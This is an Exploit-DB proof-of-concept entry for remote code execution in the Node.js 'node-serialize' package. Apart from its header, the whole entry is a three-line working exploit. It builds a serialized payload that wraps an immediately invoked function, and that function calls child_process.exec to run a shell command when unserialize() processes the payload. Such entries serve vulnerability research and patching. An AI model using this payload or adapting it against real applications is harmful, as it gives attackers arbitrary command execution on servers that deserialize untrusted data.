Node.JS - 'node-serialize' Remote Code Execution

EDB-ID:

45265


Author:

OpSecX

Type:

remote


Platform:

Linux

Date:

2017-02-08


var serialize = require('node-serialize');
var payload = '{"rce":"_$$ND_FUNC$$_function (){require(\'child_process\').exec(\'ls /\', function(error, stdout, stderr) { console.log(stdout) });}()"}';
serialize.unserialize(payload);